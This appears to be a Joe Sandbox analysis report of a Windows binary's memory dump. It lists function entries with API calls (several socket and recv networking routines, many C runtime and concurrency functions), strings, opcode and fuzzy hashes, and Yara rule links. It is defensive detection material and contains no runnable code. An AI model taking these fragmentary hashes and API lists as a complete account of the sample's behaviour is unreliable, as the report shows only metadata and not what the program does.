Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: eee0f6ad0d8e6e43fb62291b09d13235add9bf825f0f2bdc41dedb14975bfcf0
Instruction ID: 0fc50d98468fd4d6d4b903530dd80d0bd4193288137a28443f120bff8f9ec53a
Opcode Fuzzy Hash: eee0f6ad0d8e6e43fb62291b09d13235add9bf825f0f2bdc41dedb14975bfcf0
Instruction Fuzzy Hash: 7C01DB37F0C62535D6146019AC0267B57989FA2BB4B1A402AF9D4F72C2EFF4FC4251E0

Function 000F4DB2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 000F4E11
std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F4E34
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 000F4E76

Strings

ppVirtualProcessorRoots, xrefs: 000F4E2C
count, xrefs: 000F4DCA

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 28d769b56e09511c1895579848637bd9b8081c0c626d777830bf95e19dc7469b
Instruction ID: d580da3540d6cdf7f9f615017b911a95cd300778ef3d1091cf8e022a68a5deab
Opcode Fuzzy Hash: 28d769b56e09511c1895579848637bd9b8081c0c626d777830bf95e19dc7469b
Instruction Fuzzy Hash: 0A217135A00119EFCB14EFA8C991EBE77B5FF48310F10406AEA0697A92DB71AA11DB51

Function 00105EC7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00105F17

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: aee66102221e91d6f956c935e1e22f3c7ce4df586cdb4db7c038c19ea8e5ca9d
Instruction ID: c2febbabc9e2e5905ac4acca4bef539b0eb76f8d83f5ff6a28fa976c9c269419
Opcode Fuzzy Hash: aee66102221e91d6f956c935e1e22f3c7ce4df586cdb4db7c038c19ea8e5ca9d
Instruction Fuzzy Hash: 49110831A01A26FBDB328B28DC44A1F775A9F057B0B210211FD96E72D1D7B4DD018EE0

Function 00101FA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00101FC4
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00101FD5
StructuredWorkStealingQueue.LIBCMT ref: 0010200B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0010201C

Strings

e, xrefs: 00101FE6

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 27e33f9c1d9992452409f7b029a2a168c948bc0adf292f68086a1a73fbaa485e
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 0811EC31100209ABDB19DF78C945A6F73A9AF12394B24C069FC41CF296DBF5ED04DBA1

Function 0010647D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00106472,?,?,0010643A,?,?,?), ref: 00106492
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001064A5
FreeLibrary.KERNEL32(00000000,?,?,00106472,?,?,0010643A,?,?,?), ref: 001064C8

Strings

mscoree.dll, xrefs: 0010648B
CorExitProcess, xrefs: 0010649D

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 924cb6614ca1ea342f625304dd0327fa4e26f05a7d913b83a7c524e484320862
Instruction ID: 8a9e7e907bd794292acf17f9119d510d612942aa058f1318f533ca13c604a8c4
Opcode Fuzzy Hash: 924cb6614ca1ea342f625304dd0327fa4e26f05a7d913b83a7c524e484320862
Instruction Fuzzy Hash: 66F0A03150121DFBDB229B90ED0DB9EBB79EB04752F154160F804F25A0CBB48E71EB90

Function 00116649 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(007321D8,007321D8,?,7FFFFFFF,?,?,00116905,007321D8,007321D8,?,007321D8,?,?,?,?,007321D8), ref: 001166EC
__alloca_probe_16.LIBCMT ref: 001167A2
__alloca_probe_16.LIBCMT ref: 00116838
__freea.LIBCMT ref: 001168A3
__freea.LIBCMT ref: 001168AF

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: c7a0852eb26af4dfb7e6d01e72b61bbfddade466accb86f457e00539f23dd5c2
Instruction ID: 93bf9cc0a2f03cdf64a7e70a83f927d1763e67548d526bc772a15cea66abacf5
Opcode Fuzzy Hash: c7a0852eb26af4dfb7e6d01e72b61bbfddade466accb86f457e00539f23dd5c2
Instruction Fuzzy Hash: 5C81B172D003199BEF289E64C891AEE7BB5AF49354F194079E904B7281E773DC85CBA0

Function 00114AB4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00114B38
__alloca_probe_16.LIBCMT ref: 00114BFE
__freea.LIBCMT ref: 00114C6A

Part of subcall function 0010AEEB: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0010AF1D

__freea.LIBCMT ref: 00114C73
__freea.LIBCMT ref: 00114C96

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 857c921d9a4444bcf78b7c63170083629e363a4b99988adfff5faa326a03e23f
Instruction ID: 7581932c19fa4b7115de48bf20ce794bcaf038657a8119b5ce0096c6c9ccb2b5
Opcode Fuzzy Hash: 857c921d9a4444bcf78b7c63170083629e363a4b99988adfff5faa326a03e23f
Instruction Fuzzy Hash: A051C272601216ABEB289F65DC81FFB36A9EF84B50F254139FD04AB140E771DC9187E4

Function 000DDDBE Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 000DDE2D
recv.WS2_32(?,?,00001F40,00000000), ref: 000DDE66
recv.WS2_32(?,?,00001F40,00000000), ref: 000DDE94
closesocket.WS2_32(?), ref: 000DDF08
__Mtx_unlock.LIBCPMT ref: 000DDF3D

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Mtx_unlockrecv$closesocket
String ID:
API String ID: 1157980791-0
Opcode ID: f2ce722937d8ec3a183d5541a6e06f839f4b771e3cf7e814a5f7bc6d86a6a172
Instruction ID: 090ae43716e853f19f2ec1b1d73d34254904e18ffbc82fd6f75c137b671035be
Opcode Fuzzy Hash: f2ce722937d8ec3a183d5541a6e06f839f4b771e3cf7e814a5f7bc6d86a6a172
Instruction Fuzzy Hash: 6551F0719043459FDB219F24DC49BA9B7B4EF14300F0481ABF809AB3A3EB32AD51CB51

Function 00106DE1 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00106E03
GetFileInformationByHandle.KERNEL32(?,?), ref: 00106E5D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00106D13,?,000000FF), ref: 00106EEB
__dosmaperr.LIBCMT ref: 00106EF2
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00106F2F

Part of subcall function 00107157: __dosmaperr.LIBCMT ref: 0010718C

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: ba9cd86131797c79cb373c7a4f39338a1a78a595d7efa52a6d3b42ad044f0c90
Instruction ID: 3bf87d878ab1cef128a28bd0d8140f4e27adc39d3ac0a8a0806f7cdaa8babb1b
Opcode Fuzzy Hash: ba9cd86131797c79cb373c7a4f39338a1a78a595d7efa52a6d3b42ad044f0c90
Instruction Fuzzy Hash: 2F415A75900344AFDB24DFA5EC459ABBBF9EF88300B00452DF996D3690EB70E855CB20

Function 00101302 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00101309
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00101354
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00101387
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00101437

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 634d3a40e9e670b63d2c22f5dfbf9183ef6d34e7025894cdb838740b59dcd68b
Instruction ID: af6276db60580a4245cee260fac8f9c76ac0be4c4053e4f3afec92421edb002f
Opcode Fuzzy Hash: 634d3a40e9e670b63d2c22f5dfbf9183ef6d34e7025894cdb838740b59dcd68b
Instruction Fuzzy Hash: BA41B271A0070AAFCB04DFA9C9819EDFBB5FF48320B14822EE555E7791DB74A901CB90

Function 000FDA40 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 000FDA74

Part of subcall function 000F8E3F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 000F8E60

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 000FDAD3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 000FDAF9
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 000FDB19
Concurrency::location::_Assign.LIBCMT ref: 000FDB66

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
String ID:
API String ID: 1794448563-0
Opcode ID: e1c5dbe5726932544df063500b39fcb42b9d4c55669f872c4f9e79cb2617993a
Instruction ID: a0370b91ce64961396109c98acb44d146821527c5497db59f0e34b0c270d0e68
Opcode Fuzzy Hash: e1c5dbe5726932544df063500b39fcb42b9d4c55669f872c4f9e79cb2617993a
Instruction Fuzzy Hash: F3410371604208EFCB16EF24C886BFEBBB69F84310F15409AEA069B782CF349D45D791

Function 000F85D9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 000F85FE

Part of subcall function 000EE9E0: _SpinWait.LIBCONCRT ref: 000EE9F8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 000F8612
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 000F8644
List.LIBCMT ref: 000F86C7
List.LIBCMT ref: 000F86D6

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: c3d01aad3b101d93b08bf55993ebbec27c52ed154fc21f82d0b3fb7a1d0341b7
Instruction ID: 728045cd4c585b8a753a655298bef6cc27079f44916faedec1d0a108685d7f6a
Opcode Fuzzy Hash: c3d01aad3b101d93b08bf55993ebbec27c52ed154fc21f82d0b3fb7a1d0341b7
Instruction Fuzzy Hash: CE31787290165ADFCB24EFA4D5916FDB7B0BF14308F14806AD601BBA52DF31AE04EB90

Function 000DDCAF Relevance: 7.6, APIs: 5, Instructions: 80networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000000,?,?), ref: 000DDD0C
FreeAddrInfoW.WS2_32(?), ref: 000DDD2D
socket.WS2_32(00000002,00000001,00000000), ref: 000DDD55
connect.WS2_32(00000000,?,00000010), ref: 000DDD67
closesocket.WS2_32(00000000), ref: 000DDD81

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddrFreeInfoclosesocketconnectgetaddrinfosocket
String ID:
API String ID: 242599585-0
Opcode ID: 9303b6ff687422f481e99f4857ab66463589c14123d3b1d6df3b606ab1573dd7
Instruction ID: 3260ebc5db8093cddde497cb34a7bf064018bfa2c4dbe3f2a257e14c6e98125f
Opcode Fuzzy Hash: 9303b6ff687422f481e99f4857ab66463589c14123d3b1d6df3b606ab1573dd7
Instruction Fuzzy Hash: 58219471D19354ABDB259BA0DC4ABED73B8DF18300F0011ABF909E6281E7B599918B62

Function 0010EEDA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0010EEF2

Part of subcall function 0010AC95: HeapFree.KERNEL32(00000000,00000000,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?), ref: 0010ACAB
Part of subcall function 0010AC95: GetLastError.KERNEL32(?,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?,?), ref: 0010ACBD

_free.LIBCMT ref: 0010EF04
_free.LIBCMT ref: 0010EF16
_free.LIBCMT ref: 0010EF28
_free.LIBCMT ref: 0010EF3A

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2bdce433e09333bf5a5d8cb1fe83945bb89329a22a5cf1e7e4242ced38cd0343
Instruction ID: 8a6017f58c9ec47080b37e33da0eae0149beab251ea0258b316b92c2f5d2bd39
Opcode Fuzzy Hash: 2bdce433e09333bf5a5d8cb1fe83945bb89329a22a5cf1e7e4242ced38cd0343
Instruction Fuzzy Hash: ECF03672504309ABD626FB55FB85C1677EAFF607207A90C05F089DB981CBB0FCC08655

Function 0010D8BE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0010DA58

Strings

*?, xrefs: 0010D901

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 325afc00bb60ee3a94fc5eb9cb9f72fa75536f813325374459f70a58a738c4d1
Instruction ID: 7dc829f86ef6812bf18dfadc8a97e074b73cfe10ad0d0e384be6ba849fa03db3
Opcode Fuzzy Hash: 325afc00bb60ee3a94fc5eb9cb9f72fa75536f813325374459f70a58a738c4d1
Instruction Fuzzy Hash: 89616FB5E002199FCF14CFA8D8815EDFBF5EF58314B25816AE895E7340D7719E418B90

Function 000FAD75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 000FADFA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 000FAE1F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 000FAE5E

Strings

pExecutionResource, xrefs: 000FAE17

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: cb269d4614604c2b78a83936660f138ae784abf7a8ba214d8734b68e72c081be
Instruction ID: 08fe3e8fbaed2333c88615a713420025f428b663036e8e18ae3d65f0827444ba
Opcode Fuzzy Hash: cb269d4614604c2b78a83936660f138ae784abf7a8ba214d8734b68e72c081be
Instruction Fuzzy Hash: 5F2185B5740209AFCB08EFA4C982BED77B5BF58300F104029F6057B682DBB4AE15DB95

Function 000F9FFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 000FA012
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 000FA036
std::invalid_argument::invalid_argument.LIBCONCRT ref: 000FA049

Strings

pScheduler, xrefs: 000FA041

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
